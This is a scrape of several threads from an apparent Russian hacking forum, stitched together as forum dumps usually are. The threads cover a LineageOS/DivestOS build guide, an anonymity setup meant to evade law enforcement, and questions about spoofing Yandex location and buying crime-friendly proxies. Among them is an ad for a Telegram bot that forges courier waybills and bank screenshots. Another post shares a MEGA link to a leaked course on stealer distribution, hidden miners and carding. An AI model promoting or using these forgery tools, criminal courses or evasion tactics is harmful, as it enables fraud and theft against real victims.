path="device/google/sargo" name="LineageOS/android_device_google_sargo" remote="github" revision="lineage-20" />   <project path="device/google/coral" name="LineageOS/android_device_google_coral" remote="github" revision="lineage-20" /> <project path="device/google/flame" name="LineageOS/android_device_google_flame" remote="github" revision="lineage-20" /> <project path="kernel/google/msm-4.14" name="LineageOS/android_kernel_google_msm-4.14" remote="github" revision="lineage-20" />  <project path="device/google/sunfish" name="LineageOS/android_device_google_sunfish" remote="github" revision="lineage-20" />   <project path="device/google/bramble" name="LineageOS/android_device_google_bramble" remote="github" revision="lineage-20" /> <project path="device/google/redbull" name="LineageOS/android_device_google_redbull" remote="github" revision="lineage-20" /> <project path="kernel/google/redbull" name="LineageOS/android_kernel_google_redbull" remote="github" revision="lineage-20" />  <project path="device/google/redfin" name="LineageOS/android_device_google_redfin" remote="github" revision="lineage-20" />   <project path="device/google/barbet" name="LineageOS/android_device_google_barbet" remote="github" revision="lineage-20" />   <project path="device/google/oriole" name="LineageOS/android_device_google_oriole" remote="github" revision="lineage-20" /> <project path="device/google/raven" name="LineageOS/android_device_google_raven" remote="github" revision="lineage-20" /> <project path="device/google/raviole" name="LineageOS/android_device_google_raviole" remote="github" revision="lineage-20" /> <project path="device/google/gs101" name="LineageOS/android_device_google_gs101" remote="github" revision="lineage-20" /> <project path="kernel/google/gs101/private/gs-google" name="LineageOS/android_kernel_google_gs101" remote="github" revision="lineage-20" />  <project path="device/google/bluejay" name="LineageOS/android_device_google_bluejay" remote="github" revision="lineage-20" />   <project path="device/google/panther" name="LineageOS/android_device_google_panther" remote="github" revision="lineage-20" /> <project path="device/google/cheetah" name="LineageOS/android_device_google_cheetah" remote="github" revision="lineage-20" /> <project path="device/google/pantah" name="LineageOS/android_device_google_pantah" remote="github" revision="lineage-20" /> <project path="device/google/gs201" name="LineageOS/android_device_google_gs201" remote="github" revision="lineage-20" /> <project path="kernel/google/gs201/private/gs-google" name="LineageOS/android_kernel_google_gs201" remote="github" revision="lineage-20" />   <project path="hardware/oneplus" name="LineageOS/android_hardware_oneplus" remote="github" revision="lineage-20" /> <project path="device/oneplus/sdm845-common" name="LineageOS/android_device_oneplus_sdm845-common" remote="github" revision="lineage-20" /> <project path="device/oneplus/enchilada" name="LineageOS/android_device_oneplus_enchilada" remote="github" revision="lineage-20" /> <project path="kernel/oneplus/sdm845" name="LineageOS/android_kernel_oneplus_sdm845" remote="github" revision="lineage-20" />  <project path="device/oneplus/fajita" name="LineageOS/android_device_oneplus_fajita" remote="github" revision="lineage-20" />  <project path="device/razer/aura" name="LineageOS/android_device_razer_aura" remote="github" revision="lineage-20" /> <project path="kernel/razer/sdm845" name="LineageOS/android_kernel_razer_sdm845" remote="github" revision="lineage-20" />  <project path="vendor/google/barbet" name="LineageOS/proprietary_vendor_google_barbet" remote="github" revision="lineage-20" /> <project path="vendor/google/bluejay" name="LineageOS/proprietary_vendor_google_bluejay" remote="gitlab" revision="lineage-20" /> <project path="vendor/google/blueline" name="LineageOS/proprietary_vendor_google_blueline" remote="github" revision="lineage-20" /> <project path="vendor/google/bonito" name="LineageOS/proprietary_vendor_google_bonito" remote="github" revision="lineage-20" /> <project path="vendor/google/bramble" name="LineageOS/proprietary_vendor_google_bramble" remote="github" revision="lineage-20" /> <project path="vendor/google/cheetah" name="LineageOS/proprietary_vendor_google_cheetah" remote="gitlab" revision="lineage-20" /> <project path="vendor/google/coral" name="LineageOS/proprietary_vendor_google_coral" remote="github" revision="lineage-20" /> <project path="vendor/google/crosshatch" name="LineageOS/proprietary_vendor_google_crosshatch" remote="github" revision="lineage-20" /> <project path="vendor/google/flame" name="LineageOS/proprietary_vendor_google_flame" remote="github" revision="lineage-20" /> <project path="vendor/google/oriole" name="LineageOS/proprietary_vendor_google_oriole" remote="gitlab" revision="lineage-20" /> <project path="vendor/google/panther" name="LineageOS/proprietary_vendor_google_panther" remote="gitlab" revision="lineage-20" /> <project path="vendor/google/raven" name="LineageOS/proprietary_vendor_google_raven" remote="gitlab" revision="lineage-20" /> <project path="vendor/google/redfin" name="LineageOS/proprietary_vendor_google_redfin" remote="github" revision="lineage-20" /> <project path="vendor/google/sargo" name="LineageOS/proprietary_vendor_google_sargo" remote="github" revision="lineage-20" /> <project path="vendor/google/sunfish" name="LineageOS/proprietary_vendor_google_sunfish" remote="github" revision="lineage-20" /> <project path="vendor/oneplus/enchilada" name="LineageOS/proprietary_vendor_oneplus_enchilada" remote="github" revision="lineage-20" /> <project path="vendor/oneplus/fajita" name="LineageOS/proprietary_vendor_oneplus_fajita" remote="github" revision="lineage-20" /> <project path="vendor/oneplus/sdm845-common" name="LineageOS/proprietary_vendor_oneplus_sdm845-common" remote="github" revision="lineage-20" /> <project path="vendor/razer/aura" name="LineageOS/proprietary_vendor_razer_aura" remote="github" revision="lineage-20" /> [/CENTER] <project path="packages/modules/NetworkStack" name="lineage/packages_modules_NetworkStack" groups="pdk-cw-fs,pdk-fs" remote="iode" /> <project path="packages/modules/Permission" name="lineage/packages_modules_Permission" groups="pdk-cw-fs,pdk-fs" remote="iode" /> [CENTER] <project path="system/sepolicy" name="lineage/system_sepolicy" groups="pdk" remote="iode" /> <project path="packages/apps/FDroidPrivilegedExtension" name="lineage/packages_apps_FDroidPrivilegedExtension" remote="iode" /> <project path="vendor/extra" name="lineage/vendor_extra" remote="iode" /> <project path="system/iode-snort" name="blocker/iode-snort" remote="iode" /> <project path="external/libnetfilter_conntrack" name="blocker/external_libnetfilter_conntrack" remote="iode" /> <project path="external/libnetfilter_queue" name="blocker/external_libnetfilter_queue" remote="iode" /> <project path="external/libnfnetlink" name="blocker/external_libnfnetlink" remote="iode" /> <project path="external/libmnl" name="blocker/external_libmnl" remote="iode" /> </manifest>

Далее нам нужно произвести синхронизацию

Spoiler: Синхронизация

Наберитесь терпения процесс не быстрый

Bash:Copy to clipboard

#Download! repo init -u https://github.com/LineageOS/android.git -b lineage-20.0 --git-lfs; repo sync -j1;

После синхронизации нужно отредактировать папку vendor/iode

Spoiler: vendor_extra

Bash:Copy to clipboard

rm -rf ./bootanimation rm -rf ./etc rm -rf ./overlay rm -rf ./prebuilts/!(iode) rm -rf ./product-overlay rm -rf ./translations

Spoiler: product.mk

Makefile:Copy to clipboard

ifneq ($(wildcard certs/releasekey.*),) PRODUCT_DEFAULT_DEV_CERTIFICATE := certs/releasekey PRODUCT_OTA_PUBLIC_CERTIFICATES := certs/releasekey endif ifneq ($(wildcard certs/sideload.*),) PRODUCT_EXTRA_RECOVERY_CERTIFICATES := certs/sideload endif PRODUCT_BROKEN_VERIFY_USES_LIBRARIES := true PRODUCT_PACKAGES += \ iode-snort \ domains-black \ domains-white \ default-apps PRODUCT_PACKAGES += \ Iode PRODUCT_HOST_PACKAGES += \ host_cross_fastboot \ host_cross_mke2fs \ make_f2fs.static \ host_cross_make_f2fs.static

Далее снова переходим к инициализации окружения

Spoiler

Bash:Copy to clipboard

source ../../Scripts/init.sh; awk -i inplace '!/enforce-product-packages-exist-internal/' vendor/lineage/config/common.mk; source build/envsetup.sh && breakfast lineage_sailfish-user && make -j20 generate_verity_key; #Edit device if not available, can be any sh ../../Scripts/Generate_Signing_Keys.sh $device; #Repeat as needed for other devices mv -nv $DOS_SIGNING_KEYS/NEW/* "$DOS_SIGNING_KEYS/"; #Move the new keys into place

Spoiler: CCACHE

Bash:Copy to clipboard

mkdir /opt/ccache; # Укажите свой путь echo "export USE_CCACHE=1;" >> ~/.bashrc; echo "export CCACHE_COMPRESS=1;" >> ~/.bashrc; echo "export CCACHE_COMPRESSLEVEL=1;" >> ~/.bashrc; echo "export CCACHE_EXEC=/usr/bin/ccache;" >> ~/.bashrc; echo "export CCACHE_DIR=/opt/ccache;" >> ~/.bashrc; #Укажите свой путь из первой строки source ~/.bashrc; ccache -M 128GB; #Укажите лимит

Приступаем к сборке

Spoiler

Bash:Copy to clipboard

cd Build/LineageOS-20.0; source ../../Scripts/init.sh; resetWorkspace; rm -rf packages/apps/Fennec_DOS-Shim/ vendor/divested/ vendor/fdroid_prebuilt/ packages/apps/SupportDivestOS/; #Remove remenants rm -rf out; patchWorkspace; buildDevice [DEVICE NAME]; #buildDevice fajita как пример echo $DOS_BUILDS # тут появятся прошиви если всё сделано правильно

Если всё сделано правильно прошивки появятся в папке $DOS_BUILDS
На этом всё!

ЗЫ:
Если вам нужна подобная инфраструктура для своих девайсов, или более изощренная, где не используются vds и сервис доставки обновлений не торчит жопой в интернет, а обновления рассылаются по средствам p2p из-за nat через tox или как то иначе, вы знаете к кому обращаться.
Если и этого мало и хочется противостоять imsicatcher'am, fakeBaseStation, silentsms и триангуляции по средствам предоставления вам возможности подключения к 1 базовой станции а не к 3 через удобный интерфейс в виде карты с точками, милости прошу в торговую тему.
Так же могу сделать так чтобы ваш телефон не сможет загружался без специального стика и помимо FBE будет FDE.

Разработка программно-аппаратных комплексов

Донаты сюда:
Monero -> 47XLGe6UvUGjcFpckozPhKggU4N11Ux6WEA5hSqjZQHeJoCQ9MDgRvnfu3HFwHbm7y2nyp5Sgu4XXgEzjFYawi285cEscia
BTC -> bc1qqqr2k32my2qhuz5s3dr3nnczgl3mkcr0k38gac

Как обойти алгоритмы Яндекса?

ID: 676533bbb4103b69df371955
Thread ID: 107407
Created: 2024-02-03T18:44:15+0000
Last Post: 2024-06-07T18:54:00+0000
Author: ishark
Replies: 9 Views: 809

Здравствуйте, грубо говоря вопрос заключается в следующем.
По каким критериям Яндекс отслеживает аккаунты пользователей и возможно ли это как-то обойти, допустим, если я буду иметь несколько аккантов яндекс и нужно сделать так, чтобы яндекс думал, что я нахожусь в разных городах.
На данный момент у меня имеется представление, что Яндекс смотрит по нескольким факторам: по ближайшим точкам беспроводного доступа, IP и GSM вышкам, верятно мое представление ошибочное.
Если есть люди знающие или кто пытался разбираться в этой теме, подскажите, заранее благодарю

Неуязвимость и анонимность!

ID: 676533bbb4103b69df371b89
Thread ID: 57970
Created: 2021-10-21T17:05:21+0000
Last Post: 2021-10-24T18:35:35+0000
Author: DMG_DEALER
Replies: 11 Views: 808

Всем доброго времени!

Когда ведешь какую либо деятельность, которая привлекает внимание федералов, лучше снизить поверхность атаки и в этом ваш покорный слуга вам поможет.

Первое с чего стоит начать, это выбор железа и тут нам в масть сугубо железо с coreboot

[Build Secure Desktop](https://freundschafter.com/research/how-to-build-a- more-secure-personal-computer/)

Но для полевых выходов лучше взять ноутбук или например CHROMEBOX по вкусу (не забываем что для повышения производительности, в них можно поменять процессор, в каких то вам удастся без перепаивания апгрейднуть а где-то прийдётся отнести умельцам)

Советую ещё организовать принудительную очистку оперативной памяти средствами coreboot (При настройке перед сборкой есть пункт)

Следующим не маловажным фактором будет защита от закрепления на уровне биос и организация его вдувания и генеративности (подмена идентификаторов до старта)

Эмуляция spi чипа на котором хранится биос

Следующий шаг это организация самой операционной системы, тут кто что любит но я советую использовать linux и жить в ram, когда я говорю жить в ram я имею ввиду то что вам прийдётся собрать свой дистрибьютив (это очень просто на самом деле) т.е мутим ISO!
Дистрибьютив пишем на флешку обязательно с аппаратным замочком для блокировки записи (такие вы могли видеть на переходниках что идут в комплекте с microSD)

А теперь настало время самой главной части!
Нужно организовать доступ в интренет через прокси, но не всей системы а хукать конкретное приложение, ваша машина не должна иметь прямого выхода в интернет!
Вы должны сами открывать себе прокси! Каждый раз новый порт! И своими руками пихать нужную программу в эту прокси!
Proxychain-ng нам не подходит! Встречаем Proxybound !!!

Что мы получим реализовав и кастомизировав под себя данный гайд?

Мы получим неуязвимость, потому как когда система не имеет интернета а нужное приложение хукается, даже если вас будут атаковать, пайлоад не сможет отстучать и слить ваши данные, плюс говнецо не сможет закрепиться в системе, мы ведь живём в ram 8) Одна перезагрузка и снова чист и свеж ваш боевой товарищ !
Биос? Биос у нас генеративен и подается в топку по средствам эмуляции чипа!

PS: {Данные методы применимы к любому железу просто я не люблю проепритарный биос. Если возникнут вопросы, пишите отвечу!}

PSS: {Почему слил такую годную приватную тему? (кто в теме тот поймёт)
Потому что те для кого её разрабатывал неплохо так меня опрокинули, в тот новый год я остался без бабок, они думали что я
буду как собачка бегать, но увы и ах этого не произошло.}

Я думаю всем ясно для чего такие методы анонимности и защиты используются...

Hacker Place Academy (СЛИВ КУРСА)

ID: 676533bbb4103b69df371a65
Thread ID: 86903
Created: 2023-04-29T07:58:49+0000
Last Post: 2023-05-06T13:57:46+0000
Author: sergey4k
Prefix: Мануал/Книга
Replies: 4 Views: 808

первая часть курса
кому интересно пишите скину в личку

Бесплатный бот отрисовщик

ID: 676533bbb4103b69df371c6f
Thread ID: 45300
Created: 2020-12-08T04:47:26+0000
Last Post: 2020-12-08T04:47:26+0000
Author: Tubu
Replies: 0 Views: 807

Делюсь с вами бесплатным ботом отрисовщиком, в отличие от остальных в нём реально качественная отрисовка. Есть накладные сдек и компании, различные переводы и скрины с банков и куча других полезностей, а так же функция очистки изображения от метаданных
Сам бот - @Otrisovka_Robot

Theory and practice use containers instead of VMs

ID: 676533bbb4103b69df37196b
Thread ID: 114810
Created: 2024-05-18T08:39:49+0000
Last Post: 2024-05-19T04:25:11+0000
Author: ValeraSnowdrop
Prefix: Статья
Replies: 2 Views: 804

Приветствую всех: дамы, господа, друзья и недруги. Сегодня ~~пофантазируем~~ /поговорим о использовании контейнеров вместо VM для работы. А так же раздуем за систему мечты.

Подготовлено: ValeraSnowdrop
Специально для: xss.is

Уведомление
Важно отметить что я не являюсь экспертом в вопросе что я поднимаю и могу ошибаться в своих суждениях. Просьба к читающим: при нахождении какой либо ошибки/несостыковки/глупости оставьте комментарий под этой темой или напишите мне в PM. Давайте учиться вместе. Спасибо.

Терминология
Итак для начала определимся с терминами что будут использованы в статье. Часть терминов может считаться не общепризнанными но все равно будут использованы в рамках этой статьи.

Система для работы (System for work)
Набор программного обеспечения которое позволяет эффективно выполнять возложенные не нее обязательства в рамках набора требований. Для удобства использования этот термин может быть использован для описания хост системы и набора кубов вместе.

Хост система (host system)
Физическое устройство на котором находится программное обеспечение. В качестве примера можно привести laptop/desktop.

Куб (qube)
Один и более виртуальных машин или контейнеров изолированных от хост системы. Каждый куб выполняет свой набор задач и может отличаться от других кубов. Тут важно отметить что это именно набор из контейнеров.

Так например container-A (с ПО: браузер и firewall) и container-B (tor для container-A) могут вместе образовывать куб (назовем его person1).

Контейнер (container)
Контейнер в общем понимании. Можно использовать в том же виде, что используется в контексте docker'а.

Виртуальная машина (VM)
Виртуальная машина в общем понимании. Можно использовать в том же виде, что используется в контексте qemu/virutalbox/vmware.

Образ (image)
Образ операционной системы в общем понимании. Может использоваться и как (образ для VM) и как (образ для контейнера).

Теория
Теперь перейдем к основным требованиям и проблемам что я пытаюсь решить в рамках этой статьи.

Проблемы

Производительность. Как вы уже знаете использование VM это очень дорого в плане ресурсов компьютера. На средненьком ноутбуке за 400-500$ дай бог поднять хотя бы одну VM не говоря уже об использовании нескольких. Даже при условии что у вас действительно мощный компьютер задержку ввода никто не отменял, из-за чего падает удобство работы с такой системой, она становится неотзывчивой.

Переносимость. Так же есть проблемы с переносом данных с такой системы. Так например чтобы получить какие либо данные с VM на хост нужно их скопировать, что само по себе является дублированием данных, так еще и при больших объемах может занимать значительное время.

Переиспользование. Вы можете обменяться VM образом с другим человеком и он получит копию системы со всеми вашими конфигами (если вы не очистили их заранее), включая директорию /home, хотелось бы избежать такого поведения по умолчанию. Так же можем представить случай создания новой VM на основе старой. В таком случае вам прийдется удалять софт который не нужен в новой VM в ручном режиме и чистить от конфигов образ, либо тратить около 20 минут на установку новой голой системы, без учета времени скачивания .iso образа и ее настройки. Учитывая все эти проблемы не удивительно что мы не видим образов которыми люди делятся на форуме не опасаясь утечки данных.

Изоляция. Как вы можете предположить изоляция в случае работы с docker ниже по сравнению с VM. Тем самым вы подвергаете себя большему риску при использовании контейнеров. Попробуем снизить этот вектор атаки в рамках статьи

Требования

Высокая скорость работы. Желательно на около-любом железе. Отсутствие каких либо задержек при работе с кубом.

Возможность создания бекапов и переноса блоков информации. Тут важно подметить что важна возможность переноса именно блоков данных, а не всех данных сразу. Зачастую вам не нужны в бекапе системные папки и прочий шлак установленный вместе с пакетами.

Возможность поделится конфигом вашей системы с другим человеком. Переиспользование вашего куба для создания нового на его основе.

Открытость. Возможность управления такой системой. Возможность отключения некоторых компонентов системы.

Использование средств анонимности vpn/tor/proxy для всей системы, либо как прокси для отдельных приложений. А так же возможность использования их вместе. Тобишь создание цепочек.

Изоляция личностей созданных в рамках системы (под личностями вполне конкретно можно понимать набор виртуальных личностей). Программные средства призванные защитить смешение/пересечение этих личностей.

Достаточный уровень безопасности. Чтобы взломанный контейнер не мог значительно повлиять на хост. Желательно чтобы не мог оказать вообще никакого влияния.

Практика

Архив
Итак если я все сделал правильно, то на руках у вас будет архив с таким содержимым (исключая папки @nonroot и root они появятся после первого запуска):

Мне нужно объяснить происходящее здесь.

Все *.sh скрипты в директории scripts отвечают за управление этим чудом (кубом)

В Dockerfile и docker-compose.yml происходит настройка куба

Директории начинающиеся на @, то есть root и @nonroot это volume docker'a в которых содержится 2 домашних папки пользователя root и nonroot соответственно.

Директория _deps отвечает за софт который необходим для создания контейнера, его использование описано в Dockerfile

Файл info.txt содержит пояснение для X11

Перед запуском

Зависимости
Список необходимых пакетов установленных в системе (linux):

docker

docker-compose

xorg-xhost (только при использовании X11)

X11
Перед началом работ нам нужно изменить несколько файлов, чтобы запустить контейнер, а именно docker-compose.yml и scripts/run.sh, в зависимости от используемой хост системы вам нужна поддержка X11 либо Wayland. По умолчанию влючен именно Wayland, если вы используете X11 то необходимо в файле docker- compose.yml изменить эти строки:

Для работы в X11 так же нужно включить поддержку X11Forwarding, как это сделать вы можете почитать в info.txt. Необходимо изменить эти строки в /etc/ssh/sshd_config

Bash:Copy to clipboard

$ sudo cp /etc/ssh/sshd_config /etc/ssh/sshd_config.orig $ echo change this lines: $ sudo vim /etc/ssh/sshd_config X11Forwarding yes X11UseLocalhost no

Подробнее можете узнать тут: <https://www.baeldung.com/linux/docker-container- gui-applications>

Так же вам нужно убрать коммент в файле scripts/run.sh

Важно отметить что при работе X11 вы будете видеть input-lag в 50-80мс на глаз. Так же нужно сказать что я давно не проверял и не могу сейчас проверить работу в X11. И гайд может вовсе не работать с X11 даже после того, что я описал выше.

Wayland
Работает по умолчанию, нет необходимости в дополнительных действиях. Важно отметить что я проверил работу только в DE: gnome(wayland session) и hyprland. Работает без ошибок.

Автозапуск
Контейнер при запуске будет запускать файл /deps/autostart.sh который копируется при установке из _deps/autostart.sh, Давайте взглянем на него:
По умолчанию в контейнере будет запущен ufw/gufw firewall который не даст ликнутся вашему ip. на 22/23 строчках установлен killswitch, тут вы можете указать ip куда может обращаться ваш контейнер.

В контейнере по умолчанию так же установлен nekoray который я использую для тунелирования трафика всей системы. Его запуск объявлен на 27 строке.

Hardering
Допил/настройка под вас делается через Dockerfile и docker-compose.yml. Как с ними работать я расписывать не буду, для этого есть dockументация docker, куда я вас направляю. С файлами в папке _deps вы так же можете ознакомиться самостоятельно.

Стартуем
Запускаем scripts/run.sh и если вы все выполнили правильно, у вас должна начаться установка образа archlinux и всего что вы понаписали в Dockerfile. После 10 минут томления у вас должно открыться подобное окно:

Выбираем Xray и подрубаем сюда ваш vpn, как пользоваться nekoray думаю не нужно описывать. Или стоит?

После этого я обычно запускаю ./scripts/app.sh xfce4-terminal

А из него уже стартую любое нужное мне ПО.

Вот например librewolf

Остановить эту чудо-машину можно через ./scripts/stop.sh

Я проверил работу этого ПО (все работает):

thunar

telegram-desktop

firefox

librewolf

xfce4-terminal

xfce4-about

xeyes

nekoray

chromium (нужны доп флаги для работы в wayland: chromium --enable-features=UseOzonePlatform --ozone-platform=wayland --force-dark-mode --enable-features=WebUIDarkMode)

Подозреваю что с большинством современного ПО проблем не будет, но могут возникнуть сложности при использовании специфичного.

Заключение
В заключение приведу набор плюсов и минусов такого подхода.
Плюсы:

высокая скорость работы

переносимость

расширяемость

отзывчивость

Минусы:

требуется больше времени для установки ПО, иногда нужен перезапуск

не все ПО может работать из коробки, без донастройки

необходимо наличие специфичных технических знаний

Отдельное спасибо ребятам из этого топика: https://xss.is/threads/113716/

Слив Private Club [Hackerplace]

ID: 676533bbb4103b69df37192f
Thread ID: 122656
Created: 2024-09-13T18:52:32+0000
Last Post: 2024-09-13T19:15:51+0000
Author: Mobius_Sensei
Prefix: Мануал/Книга
Replies: 5 Views: 803

В общем, купил где-то месяца два назад вход в Private Club от hackerplace(.org)
Честно мнение: лютая хрень с общей информацией и мёртвой аудиторией, которая строится чисто на других сливах, которые уже давно разнеслись по дарку, а он приподносит здесь это, как что-то новое.
Вот что там по содержанию:
Обучение «Безопасность и Анонимность» | Часть 1
Обучение «Безопасность и Анонимность» | Часть 2
Обучение «Безопасность и Анонимность» | Часть 3
Обучение «Безопасность и Анонимность» | Часть 4
Мануал «Распространение стиллера на YouTube»
Мануал «Добыча логов и работа с ними» | Часть 1
Мануал «Добыча логов и работа с ними» | Часть 2
Онлайн конфиденциальность. Часть 1
Ботнеты: Общие понятия, классификация, монетизация
Заработок на скрытых майнерах
Bug Bounty: введение
Выбор программ Bug Bounty
Типы активов в Bug Bounty
Платформы Bug Bounty
Обнал банковских карт
Скам-шоп

Держите линк на папку, там можно даже полностью не качать, а просмотреть так:

Hidden content for authorized users.

![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- folder.png&hash=63d46597e69ae4a51888711a37d2bf45&return_error=1)

[ 38.84 MB folder on MEGA ](https://mega.nz/folder/orFWwY6L#CCU-

uuJV3OqKa-Zjs7cxnA)

17 files

mega.nz

Timing атака. Как защититься?

ID: 676533bbb4103b69df371add
Thread ID: 70753
Created: 2022-07-27T19:12:54+0000
Last Post: 2022-08-10T21:08:59+0000
Author: Linuz
Replies: 24 Views: 801

Реальна ли такая атака на пользователя tor/i2p? Например, некий хакер атакует сайты. В логах остаётся время начала и конца атаки. Эти данные сопоставляются с данными, собранными СОРМ. Затем, после 3-4 атак (что их проводит один и тот же человек можно понять по используемой инфраструктуре, софту и техникам), можно сопоставить, кто юзал Тор в это время. Насколько это осуществимо на практике? Как от этого защитится?

Оптимальные сервисы прокси / почты / антидект браузера (2024)?

ID: 676533bbb4103b69df3719c1
Thread ID: 103656
Created: 2023-12-07T00:11:11+0000
Last Post: 2024-01-22T19:44:05+0000
Author: Theriella
Replies: 8 Views: 798

Раскрываю, полностью мною интересующей темы:

Вопрос ПЕРВЫЙ, для меня из ряда причин:

_> прокси (очень часто бьются и хотелось бы повысить стабильность и качество у поставщиков);

стабильный и качественный пинг нужен, гео весь МИР;
без проверок поставщиков для каких целей мне нужны прокси;_

Поднимать свои собственные прокси или добывать, у меня нет нужды. Под задачи, они не сложные (атаки на Пентагон нет.)

Нужен сервис провайдер прокси, где оплата исключительно криптой , приват прокси, от 10 единиц покупка , т.е. просто 10 прокси нужно и всё. Стабильный и качественный пинг. И разумеется без выдачи юзеров по запросам правоохранительных служб.
Без KYC обязательной верификации.

Вопрос ВТОРОЙ , какие же сейчас самые адекватные почты для работы, протон нами "любимый" не так хорош, как кажется, что скажете про https://app.skiff.com/ ? И какие лучше всего сервисы почт сейчас ? Понятное дело с дополнительной безопасностью регистрации почты всё, но что из сервисов сейчас ведущим является?

И антидетект браузер, какой лучший из лучших ? (по цене интересно лайф тайм , хотя такого мало очень), но что у нас золотая середина трафферы? ( То, что не угоняет логи и не ведёт логгирование, есть ли такое решение на рынке сейчас?).

итого, необходимо:

1. Качественный поставщик прокси, без выдачи данных всяким интересантам на различных личностей. Со стабильным соединением и хорошим пингом, с оплатой только в крипте. Которые поощряют криминал и им всё равно на действия пользователей.
2. Почта сервис, который действительно не сливает также данные по запросу. Подобным протону - но , без слива инфы о юзерах.
3. Антидетект браузер - не ведущий логгирование юзеров и сохранение любых данных - опен сорс в идеале.

Понимаю, всё познаётся в сравнение , в опыте , в изучении, по возможности создание своих цепочек собственных (поднятие личных сервисов), но у меня стоит вопрос того - чтобы эти варианты услуги - ПОКУПАТЬ и пользоваться.

Бесплатно - из давних времён, сами знаете что и где.. Все эти "бесплатные" / анонимные почты и сервисы рано или поздно созданные отделом для поиска более умных людей = их так и вычисляют, поэтому важно ВАШЕ мнение, о ваших фаворитах на текущий момент. Лучше всего кто использовал свои сервисы, которые служат в ваших задачах по сей день (желательно в очень сложных задачах, где порой нужно быть очень анонимным).

Тем много на разных форумах, но интересна именно эта цепочка. Так как есть прикол, допустим : у некоторых сервисов > почта на протоне - попадает в отдельный лист (для поиска инфы на людей), и далее по ИИ ищут нужную инфу, скоро думаю ИИ станет сильным оружием , способным вычислять кого угодно и где угодно, если не выполнять минимально по защите.

Заранее спасибо, всем кто даст свой комментарий из практики, опытов, наблюдений и тестирования.

пс. ещё интересно, кто что думает, насчёт такой темы, что бывает случаи > когда ФБР находит человека > который ПОЛНОСТЬЮ анонимный был, но вышел со своего IP адреса проверить тот же свой биткойн адрес, и далее ФБР проверяет и делает наблюдение за охотником за мамонтами? > а если охотник так скажем принёс убыток США на очень крупные суммы, смотрят точки входа и проверки адреса по IP, далее всякие примочки сканирование со спутника , через сеть строение графики помещений, и прочие примочки , но это надо сильно амеров разозлить наносив убытки (ДЕЙСТВИТЕЛЬНО крупные и то, что несёт вред большой стране) , как это делают локеры и прочее, 99% рано или поздно их принимают из- за жадности и других факторов, я уверен на все 999% ,что ИИ в будущем создаст такой инструмент что ему нужно будет минут 10 и он найдёт того, кто нужен))) Но самое интересное вопрос, про выход проверки своего адреса крипты по IP своему и там уже могут смотреть кто, и когда смотрел адрес этот и там уже приступают к делу. Сам так не делаю и вам не рекомендую, но всё же , я думаю так мониторят адреса , особенно если это были биржевые транзакции. Как вот защититься от ИИ монстра в будущем? Какие мысли?

VPN + Tor на андроид

ID: 676533bbb4103b69df371c69
Thread ID: 45564
Created: 2020-12-15T17:00:00+0000
Last Post: 2020-12-15T17:00:00+0000
Author: user259
Replies: 0 Views: 794

Здравствуйте!
Хочу сделать цепочку Device -> Tor -> VPN -> Internet на андоид.
Цели использовать впн поверх тора: обход блокировок тора на сайта и обход зверских гугл капч, которые вылезают на каждом сайте чуть ли не каждую минуту, когда используешь тор.
В то время как на ПК такая цепочка создается виртуальными машинами в основном, как на андроиде, ведь на андроиде нет виртуальных машин?
Интернет мобильный, поэтому всякие манипуляции с роутером не подходят, да и не хочу что бы цепочка зависела от источника интернета.
Заранее спасибо!

Личный сервер shadowsocks за 10 минут без затрат

ID: 676533bbb4103b69df371a28
Thread ID: 95077
Created: 2023-08-07T20:36:27+0000
Last Post: 2023-08-16T15:22:36+0000
Author: baykal
Prefix: Статья
Replies: 7 Views: 792

Несколько слов о shadowsocks

shadowsocks - это шифрованный сетевой туннель, клиентская часть которого предоставляет доступ приложениям к сети как SOCKS-прокси, запущенный на этом же устройстве. В некотором смысле его можно использовать как VPN, потому что клиенты поддерживают прозрачное перенаправление трафика приложений в туннель.

С самого начала shadowsocks разрабатывался как средство для обхода блокировок в Китае. С некоторого момента он получил возможность подключения внешних модулей-плагинов для оборачивания трафика shadowsocks в различные виды сетевых соединений. Это значительно расширяет границы его применения.

В этом руководстве описано развёртывание сервера shadowsocks с плагином v2ray на облачном провайдере Heroku. Платформа Heroku позволяет бесплатно разворачивать небольшие веб-приложения, а плагин v2ray позволяет пропускать трафик shadowsocks внутри websocket-соединения, что в итоге и позволяет запускать всю конструкцию на Heroku.

Развёртывание сервера

В этом руководстве используется проект готового приложения для Heroku, которое реализует всё необходимое автоматически. Ссылка на мой форк этого проекта.

Шаг 1. Регистрация в сервисе Heroku

Для этого нужно зайти на сайт Heroku, нажать Sign up и заполнить требуемые сведения. Для регистрации нужна только электронная почта.

Шаг 2. Начало развёртывания

Нажмите на эту ссылку.

Шаг 3. Конфигурирование

В появившейся форме заполните все поля как показано на скриншоте:

В качестве значений "App Name" и AppName впишите какое-то уникальное имя приложения, одинаковое в обоих полях. Это имя станет частью доменного имени .herokuapp.com, по которому станет доступен сервис.

Вместо PASSWORD задайте свой пароль. Можно задать подлиннее и понадёжнее - Вам, скорее всего, не придётся вводить его вручную.

Кроме того, желательно поменять путь QR на какое-нибудь трудноугадываемое значение.

Шаг 4. Запуск

Заполнив форму, нажмите Deploy app.

После завершения сборки и запуска QR-код с конфигурацией для мобильных устройств будет доступен по адресу

Code:Copy to clipboard

https://APPNAME.herokuapp.com/qr/vpn.png

а строка с конфигурацией в виде URL будет доступна по адресу

Code:Copy to clipboard

https://APPNAME.herokuapp.com/qr/

где APPNAME - выбранное Вами имя приложения. Если Вы меняли путь к QR-коду, то ссылка изменится в соответственно. Во второй ссылке косая черта на конце обязательна.

Всё, можно пользоваться!

Настройка мобильного клиента на примере Android

Установите на Ваше устройство клиент shadowsocks и плагин v2ray к нему.

Запустите приложение и добавьте новый профиль кнопкой с плюсом в правом верхнем углу. Выберите сканирование QR-кода и отсканируйте его.

Выберите созданный профиль касанием.

Запустите соединение нажатием на круглую кнопку внизу.

Готово!

Настройка настольного клиента на примере Windows

Скачайте отсюда и распакуйте shadowsocks.

Скачайте отсюда плагин v2ray, подходящий под вашу платформу. Достаньте из архива файл и переименуйте его в v2ray.exe (или просто v2ray, если ваш проводник не отображает расширения файлов). Поместите его в одну директорию с shadowsocks.

Запустите shadowsocks.

Скопируйте конфигурационный URL вашего личного сервера shadowsocks со страницы https://APPNAME.herokuapp.com/qr/ , где APPNAME - имя приложения, которое вы выбрали.

Нажмите правой кнопкой мыши на значке shadowsocks в системном трее и выберите Servers - Import URL from Сlipboard.

Включите прокси, выбрав в том же контекстном меню System Proxy - Global.

Готово!
